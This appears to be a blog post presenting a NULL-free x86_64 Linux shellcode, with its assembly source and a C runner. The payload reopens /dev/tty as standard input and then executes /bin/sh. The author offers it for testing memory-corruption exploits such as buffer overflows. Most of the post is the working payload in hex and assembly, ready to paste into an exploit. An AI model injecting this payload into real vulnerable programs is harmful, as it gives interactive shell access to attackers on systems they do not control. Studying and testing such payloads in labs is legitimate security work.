Running the shellcode with reclaiming the input

I have seen that occasionally security researchers, learners and coders who wanna test a specific shellcode against some kind of memory corruption (overflow for example) face difficulties running OS shell commands after successfully spawning a shell. The reason is that the program stops immediately after “execv” starts a system shell because there’s no valid input left for the process and standard input is no longer attached to the user keyboard. This problem usually occurs when standard input has been changed to receive data from something else, a pipe for example. If you want to be able to type commands after shellcode is spawned, the solution is to reclaim (or reopen) the input, taking it back to normal state. I have written a shellcode which does exactly this. I have modified the machine code for the final code stream to be NULL-free so that can be used in different test cases for memory attacks evaluations. Use the code below to run the shellcode, or simply copy and paste the sc string into your own environment to use the code. Keep in mind this has been written for Intel x86_64 architecture and Linux OS. (Tested on latest version of Debian amd64)
Further, I have written the code in AT&T assembly format. If you prefer Intel format just use ndisasm or gdb to view the Intel form of the code.



/*

This code reclaims the standard input before spawning a shell. 
This resolves input issues with pipes and redirection.
Author:    Sirus Shahini

The sc string contains the hex equivalent of the assembly code below.
------------------------------------------------------------------------------------
.text                                                                              #
    .global _start                                                                 #
_start:                                                                            #
    xor %rcx,%rcx                                                                  #
    mov $0x7974742f7665642f,%rax                                                   #
    push %rcx                                                                      #
    push %rax                                                                      #
    mov %rsp,%rdi                                                                  #
    mov %ecx,%esi                                                                  #
    push $0x02                                                                     #
    pop  %rax                                                                      #
    syscall                                                                        #
    mov %eax,%ebx                                                                  #
    xor %rcx,%rcx                                                                  #
    mov %ecx,%edi                                                                  #
    push $0x03                                                                     #
    pop %rax                                                                       #
    syscall                                                                        #
    xor %rcx,%rcx                                                                  #
    mov %ebx,%edi                                                                  #
    mov %ecx,%esi                                                                  #
    push     $0x21                                                                 #
    pop      %rax                                                                  #
    syscall                                                                        #                                                                            
    xor %rcx,%rcx                                                                  #
    mov $0x68732f2f6e69622f,%rax                                                   #
    push %rcx                                                                      #
    push %rax                                                                      #
    mov %rsp,%rdi                                                                  #
    xor %eax,%eax                                                                  #
    mov %eax,%esi                                                                  #
    mov %eax,%edx                                                                  #
    push $59                                                                       #
    pop %rax                                                                       #
    syscall                                                                        #
------------------------------------------------------------------------------------

*/

#include <stdio.h>
int main(){
    char *sc = "\x48\x31\xC9\x48\xB8\x2F\x64\x65\x76\x2F\x74\x74\x79\x51\x50\x48"
               "\x89\xE7\x89\xCE\x6A\x02\x58\x0F\x05\x89\xC3\x48\x31\xC9\x89\xCF"
               "\x6A\x03\x58\x0F\x05\x48\x31\xC9\x89\xDF\x89\xCE\x6A\x21\x58\x0F"
               "\x05\x48\x31\xC9\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x51\x50"
               "\x48\x89\xE7\x31\xC0\x89\xC6\x89\xC2\x6A\x3B\x58\x0F\x05";
    printf("By Cyrus Sh\n");
    ((void(*)())sc)();
}

Leave a Reply

Your email address will not be published. Required fields are marked *